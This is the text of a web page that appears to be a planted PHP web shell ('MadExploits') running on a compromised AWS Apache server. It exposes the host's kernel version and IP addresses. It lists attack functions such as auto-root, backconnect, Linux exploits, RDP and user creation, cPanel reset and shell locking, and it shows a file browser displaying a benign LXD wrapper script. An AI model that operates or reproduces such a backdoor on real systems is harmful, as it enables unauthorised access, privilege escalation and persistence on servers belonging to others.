Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.224.202.121
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
snap /
lxd /
33246 /
commands /
[ HOME SHELL ]
Name
Size
Permission
Action
buginfo
2.29
KB
-rwxr-xr-x
daemon.activate
4.04
KB
-rwxr-xr-x
daemon.reload
382
B
-rwxr-xr-x
daemon.start
29.66
KB
-rwxr-xr-x
daemon.stop
4.7
KB
-rwxr-xr-x
lxc
1.26
KB
-rwxr-xr-x
lxd
1.1
KB
-rwxr-xr-x
lxd-check-kernel
310
B
-rwxr-xr-x
lxd-user
650
B
-rwxr-xr-x
refresh
154
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lxc
#!/bin/sh set -eu # Fill SNAP_REAL_HOME if missing if [ -z "${SNAP_REAL_HOME:-""}" ]; then SNAP_REAL_HOME="${HOME}" if [ "${USER:-}" = "root" ] && [ -e "/root" ]; then SNAP_REAL_HOME="/root" elif [ -n "${USER:-}" ] && [ -e "/home/${USER}" ]; then SNAP_REAL_HOME="/home/${USER}" fi fi # Set the environment if [ -z "${LXD_DIR:-""}" ]; then export LXD_DIR="${SNAP_COMMON}/lxd/" if [ ! -w "${SNAP_COMMON}/lxd/unix.socket" ] && [ -w "${SNAP_COMMON}/lxd-user/unix.socket" ]; then export LXD_DIR="${SNAP_COMMON}/lxd-user/" fi fi export LXD_CONF="${SNAP_USER_COMMON}/config" [ -d "${LXD_CONF}" ] || mkdir -p "${LXD_CONF}" export LXD_GLOBAL_CONF="${LXD_GLOBAL_CONF:-"${SNAP_COMMON}/global-conf/"}" # Use editor wrapper export EDITOR="${SNAP}/bin/editor ${EDITOR:-}" export VISUAL="${EDITOR}" # Reset all locales as it isn't available in the snap (#29) LANG=C.UTF-8 export LC_ALL=C.UTF-8 # Add extra binaries to path export PATH="/run/bin:${PATH}" LXC="${SNAP}/bin/lxc" if [ -x "${SNAP_COMMON}/lxc.debug" ]; then LXC="${SNAP_COMMON}/lxc.debug" fi # Run lxc itself outside of apparmor confinement if [ -d /sys/kernel/security/apparmor ]; then exec /usr/bin/aa-exec -p unconfined -- "${LXC}" "$@" fi # Run lxc itself exec "${LXC}" "$@"
Close